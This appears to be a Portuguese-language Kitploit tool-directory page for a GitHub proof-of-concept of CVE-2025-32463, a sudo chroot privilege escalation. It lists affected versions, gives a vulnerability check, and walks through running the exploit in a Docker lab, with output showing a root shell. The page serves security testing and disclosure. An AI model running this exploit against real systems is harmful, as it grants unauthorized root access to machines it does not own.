Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32463_chwoot — Escalada de privilégio para o root através do binário sudo com a opção chroot. CVE-2025-32463 | Kitploit
Ferramentas/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingEscape de Contêiner
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

Escalada de privilégio para o root através do binário sudo com a opção chroot. CVE-2025-32463

Ver Repositório
5259512há 9 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Este repositório fornece um ambiente mínimo e reproduzível para demonstrar a falha de escalada de privilégios CVE‑2025‑32463 no recurso chroot do sudo.

  • Esta vulnerabilidade foi reportada por Rich Mirch (@0xm1rch no X) @ Stratascale.
  • Post original: Aviso de Vulnerabilidade: Elevação de Privilégio no chroot do Sudo
  • NVD: CVE-2025-32463 (CVSS 9.3)

Versões Afetadas

As compilações vulneráveis do sudo 1.9.14 até 1.9.17 (todas as p‑revisions) na maioria das distribuições Linux são afetadas.

Páginas de Segurança

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian (CVSS 7.8)

Conteúdo

ArquivoPropósito
DockerfileConstrói uma imagem Ubuntu 24.04 com sudo 1.9.16p2 vulnerável e ferramentas de compilação
sudo‑chwoot.shExploit de prova de conceito que gera um shell root dentro do chroot

Verificação rápida de vulnerabilidade

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Testar exploit no contêiner Docker

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

O run.sh passa --privileged e --rm para o Docker para que o contêiner se limpe ao sair.


Limpeza

Remova a imagem quando terminar:

root@kitploit:~
docker rmi sudo-chwoot

Referência

  • Nota de vulnerabilidade Stratascale CRU: Aviso de Vulnerabilidade: Elevação de Privilégio no chroot do Sudo
Baixar ferramenta
run.sh
Script auxiliar que constrói a imagem (se necessário) e inicia o contêiner do exploit